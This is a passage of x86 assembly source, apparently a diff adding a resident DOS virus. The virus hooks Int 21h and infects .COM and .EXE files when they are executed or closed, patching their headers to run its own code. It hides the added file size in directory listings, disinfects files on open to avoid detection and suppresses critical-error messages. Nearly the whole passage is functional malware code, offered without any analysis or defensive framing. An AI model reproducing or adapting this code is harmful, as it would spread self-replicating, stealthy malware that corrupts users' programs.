+tb_int2 dd 0 + +;=============================================================================== +; Int 13h Handler +;=============================================================================== +int13_handler: + cmp ax,0abcdh ;virus test + je int13_test ;yupe + +int13call: jmp dword ptr cs:[int13] ;original int13 + +int13_test: mov bx,ax ;fix + iret +;=============================================================================== +; Int 1Ch Handler +;=============================================================================== +int1c_handler: + iret +;------------------------------------------------------------------------------- +; FCB Dir Stealth Routine (File Find) +;------------------------------------------------------------------------------- +fcb_dir: call calldos21 ;get the fcb block + test al,al ;test for error + jnz fcb_out ;jmp if error + push ax ;save registers + push bx + push cx + push es + mov ah,51h ;get current psp + call calldos21 ;call int21 + + mov es,bx ;es=segment of psp + cmp bx,es:[16h] ;psp of command.com? + jnz fcb_out1 ;no, then jmp + mov bx,dx ;ds:bx=fcb + mov al,[bx] ;1st byte of fcb + push ax ;save it + mov ah,2fh ;get dta + call calldos21 ;es:bx <- dta + + pop ax ;get first byte + inc al ;al=ffh therefor al=ZR + jnz fcb_old ;if != ZR jmp + add bx,7h ;extended fcb here, +7 +fcb_old: mov ax,es:[bx+17h] ;get file time stamp + mov cx,es:[bx+19h] ;get file date stamp + and ax,1fh ;unmask seconds field + and cx,1fh ;unmask day of month + xor ax,cx ;are they equal? + jnz fcb_out1 ;nope, exit then + sub word ptr es:[bx+1dh],virus_size ;sub away virus_size + sbb word ptr es:[bx+1fh],0 ;sub with carry flag + +fcb_out1: pop es ;restore registers + pop cx + pop bx + pop ax +fcb_out: iret ;return control +;------------------------------------------------------------------------------- +; ASCIIZ Dir Stealth Routine (File Find) +;------------------------------------------------------------------------------- +dta_dir: call calldos21 ;get results to dta + jb dta_out ;if error, split + push ax ;save register + push bx + push cx + push es + mov ah,2fh ;get current dta + call calldos21 ;es:bx <- dta + + mov ax,es:[bx+16h] ;get file time stamp + mov cx,es:[bx+18h] ;get file date stamp + and ax,1fh ;unmask seconds field + and cx,1fh ;unmask day of month + xor ax,cx ;are they equal + jnz dta_out1 ;nope, exit then + sub word ptr es:[bx+1ah],virus_size ;sub away virus_size + sbb word ptr es:[bx+1ch],0 ;sub with carry flag + +dta_out1: pop es ;restore registers + pop cx + pop bx + pop ax +dta_out: retf 0002h ;pop 2 words of stack +;=============================================================================== +; Int 21h Handler +;=============================================================================== +int21_handler: +; cmp ah,11h ;FCB find first match +; je old_dir +; cmp ah,12h ;FCB find next match +; je old_dir + cmp ah,4eh ;Find first match + je new_dir + cmp ah,4fh ;Find next match + je new_dir + cmp ah,3dh ;Opening a file + je file_open + cmp ah,6ch ;Ext_opening a file + je file_ext_open + cmp ah,3eh ;closing a file + je file_close + cmp ah,4bh ;Execution of a file + je file_execute + +int21call: jmp dword ptr cs:[int21] ;original int21 + +old_dir: jmp fcb_dir ;fcb file find + +new_dir: jmp dta_dir ;new asciiz file find + +file_open: jmp open_file ;disinfect opening file + +file_ext_open: jmp open_ext_file ;disinfect opening file + +file_close: jmp close_file ;infect closing file + +file_execute: call check_extension ;check for ok ext + cmp byte ptr cs:[com_ext],1 ;is it a com? + je exec_disinfect ;yupe disinfect it + cmp byte ptr cs:[exe_ext],1 ;is it a exe? + je exec_disinfect ;yupe disinfect it + jmp SHORT int21call + +exec_disinfect: call exec_disinfect1 ;Disinfect file + + mov word ptr cs:[ax_reg],dx + pushf ;fake an int + call dword ptr cs:[int21] ;call dos + xchg word ptr cs:[ax_reg],dx ;restore dx + + mov byte ptr cs:[close],0 ;reset flag.. + push ax ;store 'em + push bx + push cx + push dx + push si + push di + push es + push ds +closing_infect: mov ax,3524h ;get error handler + call calldos21 ;call dos + + push es ;save es:bx= int_24 + push bx ;error handler + push ds ;ds:dx= asciiz string + push dx + push cs ;cs=ds + pop ds + mov dx,offset int21_handler ;hook error handler + mov ax,2524h ;with our int24h + call calldos21 + pop dx ;restore ds:dx asciiz + pop ds ;string + + cmp byte ptr cs:[close],0 ;Are we closing file? + je exec_get_att ;nope, then jmp + mov ax,word ptr cs:[handle] ;yupe, ax=file handle + jmp exec_open_ok ;jmp so you don't open + ;the file twice... +exec_get_att: mov ax,4300h ;get file attribs + call calldos21 ;call dos + jnc exec_attrib ;no, error jmp + jmp exec_exit2 ;ERROR - split + +exec_attrib: mov byte ptr cs:[attrib],cl + test cl,1 ;check bit 0 (read_only) + jz exec_attrib_ok ;if bit0=0 jmp + dec cx ;else turn of bit_0 + mov ax,4301h ;write new attribs + call calldos21 ;call dos + +exec_attrib_ok: mov ax,3d02h ;open file for r/w + call calldos21 ;call dos + jnc exec_open_ok ;ok, no error jmp + jmp exec_exit2 ;ERROR - split + +exec_open_ok: xchg bx,ax ;bx=file handler + push cs ;cs=ds + pop ds + mov ax,5700h ;get file time/date + call calldos21 ;call dos + + mov word ptr cs:[old_time],cx ;save file time + mov word ptr cs:[org_time],cx + mov word ptr cs:[old_date],dx ;save file date + and cx,1fh ;unmask second field + and dx,1fh ;unmask date field + xor cx,dx ;are they equal? + jnz exec_time_ok ;nope, file not infected + jmp exec_exit3 ;FILE INFECTED + +exec_time_ok: and word ptr cs:[old_time],0ffe0h ;reset second bits + or word ptr cs:[old_time],dx ;seconds=day of month + + mov ax,4200h ;reset ptr to beginning + xor cx,cx ;(as opened files may + xor dx,dx ; have ptr anywhere, + call calldos21 ; so be smart!) + + mov word ptr cs:[marker],0DBDBh ;File Infection marker + mov dx,offset ds:[buffer] ;ds:dx buffer + mov cx,18h ;read 18h bytes + mov ah,3fh ;read from handle + call calldos21 ;call dos + + jc exec_exit1 ;error? if yes jmp + sub cx,ax ;did we read 18h bytes? + jnz exec_exit1 ;if no exit + mov dx,cx ;cx=0 dx=0 + mov ax,4202h ;jmp to EOF + call calldos21 ;call dos + + jc exec_exit1 ;error? exit if so. + mov word ptr cs:[filesize+2],ax ;save lower 16bit fileSz + mov word ptr cs:[filesize],dx ;save upper 16bit fileSz + call chkbuf ;check if .exe + jz exec_cool ;jmp if .exe file + cmp ax,0FFF0h - virus_size ;64k-256-virus < 64k? + jb exec_cool ;if less jmp! + +exec_exit1: jmp exec_exit3 ;exit! + +;_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- +; Mutate and infect +;-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_ + +exec_cool: mov dx,offset init_virus ;ds:dx=virus beginning + mov cx,virus_size ;cx=virus size + mov ah,40h ;write to handle + call calldos21 ;call dos + + jc exec_exit1 ;error? if yes exit + sub cx,ax ;cx=ax bytes? + jnz exec_exit1 ;not equal exit + mov dx,cx ;cx=0 dx=0 + mov ax,4200h ;jmp to top of file + call calldos21 ;call dos + + jc exec_exit1 ;error, then exit + mov ax,word ptr cs:[filesize+2] ;ax=lower 16bit fileSize + call chkbuf ;check if .exe + jnz exec_com_file ;if !=.exe jmp + mov dx,word ptr cs:[filesize] ;get upper 16bit + + mov cx,4 ;cx=0004 + mov si,word ptr cs:[buffer+8] ;get exe header size + shl si,cl ;mul by 16 + sub ax,si ;exe_header - filesize + sbb dx,0h ;sub with carry + + mov cx,10h ;cx=0010 + div cx ;ax=length in para + ;dx=remaider + mov word ptr cs:[buffer+20],dx ;New IP offset address + mov word ptr cs:[buffer+22],ax ;New CS (In paragraphs) + add dx,virus_size+100h ;Dx=virus_size+256 + + mov word ptr cs:[buffer+16],dx ;New SP entry + mov word ptr cs:[buffer+14],ax ;New SS (in para) + add word ptr cs:[buffer+10],(virus_size)/16+1 ;min para + mov ax,word ptr cs:[buffer+10] ;ax=min para needed + cmp ax,word ptr cs:[buffer+12] ;cmp with max para + jb exec_size_ok ;jmp if ok! + mov word ptr cs:[buffer+12],ax ;nop, enter new max + +exec_size_ok: mov ax,word ptr cs:[buffer+2] ;ax=file size + add ax,virus_size ;add virus to it + push ax ;push it + and ah,1 ; + mov word ptr cs:[buffer+2],ax ;restore new value + pop ax ;pop ax + mov cl,9 ; + shr ax,cl ; + add word ptr cs:[buffer+4],ax ;enter fileSz + header + mov dx,offset buffer ;ds:dx=new exe header + mov cx,18h ;cx=18h bytes to write + jmp SHORT exec_write_it ;jmp... + +exec_com_file: sub ax,3 ;sub 3 for jmp address + mov word ptr cs:[buffer+1],ax ;store new jmp value + mov byte ptr cs:[buffer],0E9h ;E9h=JMP + mov dx,offset buffer ;ds:dx=buffer + mov cx,3 ;cx=3 bytes + +exec_write_it: mov ah,40h ;write to file handle + call calldos21 ;call dos + + mov dx,word ptr cs:[old_date] ;restore old date + mov cx,word ptr cs:[old_time] ;restore old time + mov ax,5701h ;write back to file + call calldos21 ;call dos + +exec_exit3: mov ah,3eh ;close file + call calldos21 ;call dos + +exec_exit2: pop dx ;restore es:bx (the + pop ds ;original int_24) + mov ax,2524h ;put back to place + call calldos21 ;call dos + + pop ds + pop es + pop di ;pop registers + pop si + pop dx + xor cx,cx + mov cl,byte ptr cs:[attrib] ;get old file attrib + mov ax,4301h ;put them back + call calldos21 ;call dos + pop cx + pop bx + pop ax + + cmp byte ptr cs:[close],0 ;get called by exec? + je exec_good_bye ;yep, then jmp + iret ;else exit now. + +exec_good_bye: mov dx,word ptr cs:[ax_reg] ;restore dx + iret ;iret +;------------------------------------------------------------------------------- +; Close File Int21h/ah=3Eh +;------------------------------------------------------------------------------- +close_file: cmp bx,4h ;file handler > 4? + ja close_cont ;jmp if above + jmp int21call ;else exit + +close_cont: push ax ;save 'em + push bx + push cx + push dx + push si + push di + push es + push ds + + push bx ;save file handler + mov ax,1220h ;get job file table! + int 2fh ;call multiplex + ;es:di=JFT for handler + mov ax,1216h ;get system file table + mov bl,es:[di] ;bl=SFT entry + int 2fh ;call multiplex + pop bx ;save file handler + + add di,0011h + mov byte ptr es:[di-0fh],02h ;set to read/write + + add di,0017h + cmp word ptr es:[di],'OC' ;check for .COM file + jne closing_next_try ;no try next ext + cmp byte ptr es:[di+2h],'M' ;check last letter + je closing_cunt3 ;no, file no good, exit + +closing_exit: jmp closing_nogood ;exit + +closing_next_try: + cmp word ptr es:[di],'XE' ;check for .EXE file + jne closing_exit ;no, exit + cmp byte ptr es:[di+2h],'E' ;check last letter + jne closing_exit ;no, exit + +closing_cunt3: mov byte ptr cs:[close],1 ;set closing flag + mov word ptr cs:[handle],bx ;save handler + jmp closing_infect ;infect file! + +closing_nogood: pop ds ;restore 'em + pop es + pop di + pop si + pop dx + pop cx + pop bx + pop ax + jmp int21call ;good bye, baby... +;------------------------------------------------------------------------------- +; Execute Disinfecting routine +;------------------------------------------------------------------------------- +exec_disinfect1 PROC + push ax ;save registers + push bx + push cx + push dx + push ds + + mov ax,4300h ;get file attribs + call calldos21 ;call dos + + test cl,1h ;is Read-only flag? + jz okay_dis ;no, jmp attribs ok + dec cx ;turn off bit 0 + mov ax,4301h ;write new attribs + call calldos21 ;call dos + jnc okay_dis ;No error? then jmp + jmp end_dis ;error? exit! + +okay_dis: mov ax,3d02h ;open file for r/w + call calldos21 ;call dos + jnc dis_fileopen ;No error? then jmp + jmp end_dis ;Error? exit! + +dis_fileopen: xchg bx,ax ;bx=file handle + mov ax,5700h ;get file time/date + call calldos21 ;call dos + + mov word ptr cs:[old_time],cx ;save file time + mov word ptr cs:[old_date],dx ;save file date + and cx,1fh ;unmask second field + and dx,1fh ;unmask date field + xor cx,dx ;are they equal? + jnz half_way ;nope, file not infected + + mov ax,4202h ;jmp to EOF + xor cx,cx ;cx=0 + xor dx,dx ;dx=0 + call calldos21 ;call dos + + push cs ;cs=ds + pop ds ; + mov cx,dx ;dx:ax=file size + mov dx,ax ;save to cx:dx + push cx ;save upper fileSz + push dx ;save lower fileSz + + sub dx,1Ch ;filesize-1C=origin byte + sbb cx,0 ;sub with carry + mov ax,4200h ;position ptr + call calldos21 ;call dos + + mov ah,3fh ;open file + mov cx,1Ch ;read last 1Ch bytes + mov dx,offset org_time ;put in ds:dx + call calldos21 ;call dos + call chkbuf ;Did it work? + je half ;Yes,Jmp + cmp word ptr ds:[marker],0DBDBh ;File REALLY Infected? + je half ;Yes, then jmp + + pop dx + pop cx +half_way: jmp end_dis1 ;exit, error! + +half: xor cx,cx ;cx=0 + xor dx,dx ;dx=0 + mov ax,4200h ;pointer to top of file + call calldos21 ;call dos + + mov ah,40h ;write function + mov dx,offset buffer ;ds:dx=buffer + mov cx,18h ;cx=18h bytes to write + call chkbuf ;check if .exe? + jz SHORT dis_exe_jmp ;yupe, jmp + mov cx,3h ;else write 3 bytes +dis_exe_jmp: call calldos21 ;call dos + + pop dx ;pop original fileSz + pop cx + + sub dx,virus_size ;Sub with virus_size + sbb cx,0 ;sub with carry + mov ax,4200h ;ptr top of virus + call calldos21 ;call dos + + mov ah,40h ;write function + xor cx,cx ;write 0 bytes + call calldos21 ;call dos! (new EOF) + + mov cx,word ptr ds:[org_time] ;get original time + mov dx,word ptr ds:[old_date] ;get original date + mov ax,5701h ;put back to file + call calldos21 ;call dos + +end_dis1: mov ah,3eh ;close file handle + call calldos21 ;call dos + +end_dis: pop ds ;restore values + pop dx + pop cx + pop bx + pop ax + ret +exec_disinfect1 ENDP +;------------------------------------------------------------------------------- +; Open File by DOS Int21h/ah=6ch +;------------------------------------------------------------------------------- +open_ext_file: push dx ;save DX + mov dx,si ;asciiz=DS:DX now + jmp open_ext ;jmp +;------------------------------------------------------------------------------- +; Open File by DOS Int21h/ah=3Dh +;------------------------------------------------------------------------------- +open_file: push dx ;save dx (asciiz) +open_ext: call check_extension ;check extension + cmp byte ptr cs:[com_ext],1 ;is it a .com? + je open_ok_ext ;yep, then jmp + cmp byte ptr cs:[exe_ext],1 ;is it a .exe? + je open_ok_ext ;yep, them jmp + jmp open_exit ;ext no good, exit! + +open_ok_ext: call exec_disinfect1 ;disinfect file! +open_exit: pop dx ;restore dx + jmp int21call ;exit to dos... +;------------------------------------------------------------------------------- +; Checks Buffer (EXE) Header +;------------------------------------------------------------------------------- +chkbuf PROC + push si ;save register + mov si,word ptr cs:[buffer] ;get first word + cmp si,5A4Dh ;si=ZM? + je chkbuf_ok ;if yes exit + cmp si,4D5Ah ;si=MZ? +chkbuf_ok: pop si ;pop register + ret +chkbuf ENDP +;------------------------------------------------------------------------------- +; Check file Extension +;------------------------------------------------------------------------------- +check_extension PROC + pushf ;save flags + push cx ;save cx,si + push si + mov si,dx ;ds:[si]=asciiz + mov cx,128 ;scan 128 bytes max + mov byte ptr cs:[com_ext],0 ;reset .com flag + mov byte ptr cs:[exe_ext],0 ;reset .exe flag + +check_ext: cmp byte ptr ds:[si],2Eh ;scan for "." + je check_ext1 ;jmp if found + inc si ;else inc and loop + loop check_ext ;loop me + +check_ext1: inc si ;inc asciiz ptr + cmp word ptr ds:[si],'OC' ;is it .COM + jne check_ext2 ; ~~ + cmp byte ptr ds:[si+2],'M' ;is it .COM + je com_file_ext ; ~ + +check_ext2: cmp word ptr ds:[si],'oc' ;is it .com + jne check_ext3 ; ~~ + cmp byte ptr ds:[si+2],'m' ;is it .com + je com_file_ext ; ~ + +check_ext3: cmp word ptr ds:[si],'XE' ;is it .EXE + jne check_ext4 ; ~~ + cmp byte ptr ds:[si+2],'E' ;is it .EXE + je exe_file_ext ; ~ + +check_ext4: cmp word ptr ds:[si],'xe' ;is it .exe + jne check_ext_exit ; ~~ + cmp byte ptr ds:[si+2],'e' ;is it .exe + je exe_file_ext ; ~ + jmp check_ext_exit ;neither exit + +com_file_ext: mov byte ptr cs:[com_ext],1 ;found .com file + jmp SHORT check_ext_exit ;jmp short +exe_file_ext: mov byte ptr cs:[exe_ext],1 ;found .exe file + +check_ext_exit: pop si ;restore + pop cx + popf ;save flags + ret + +com_ext db 0 ;flag on=.com file +exe_ext db 0 ;flag on=.exe file +check_extension ENDP +;------------------------------------------------------------------------------- +; Original Int21h +;------------------------------------------------------------------------------- +calldos21 PROC + pushf ;fake int call + call dword ptr cs:[int21] ;call original int_21 + ret +calldos21 ENDP +;=============================================================================== +; Int 24h Handler +;=============================================================================== +int24_handler: + mov al,3 ;don't report error... + iret ;later dude... +;------------------------------------------------------------------------------- +; FLAGS - FLAGS - FLAGS - FLAGS - FLAGS + +close db 0 ;closing file + +;------------------------------------------------------------------------------- +; END - END - END - END - END - END - END + +rand_val dw 0 +flags dw 0 ;Flags are saved here +attrib db 0 ;file's attrib +filesize dd 0 ;filesize +handle dw 0 ;file handler +old_date dw 0 ;file date +old_time dw 0 ;file time +;------------------------------------------------------------------------------- +org_time dw 0 ;original file time + +;------------------------------------------------------------------------------- +buffer db 0CDh,020h ; 0 (0) EXE file signature + db 090h,090h ; 2 (2) Length of file + db 090h,090h ; 4 (4) Size of file + header (512k) + db 090h,090h ; 6 (6) # of relocation items + db 090h,090h ; 8 (8) Size of header (16byte para) + db 090h,090h ; A (10) Min para needed (16byte) + db 090h,090h ; C (12) Max para needed (16byte) + db 090h,090h ; E (14) SS reg from start in para. + db 090h,090h ; 10(16) SP reg at entry + db 090h,090h ; 12(18) checksum + db 090h,090h ; 14(20) IP reg at entry + db 090h,090h ; 16(22) CS reg from start in para. +Marker db 0DBh,0DBh ; Marks THIS File as INFECTED! +last: +seg_a ends + end start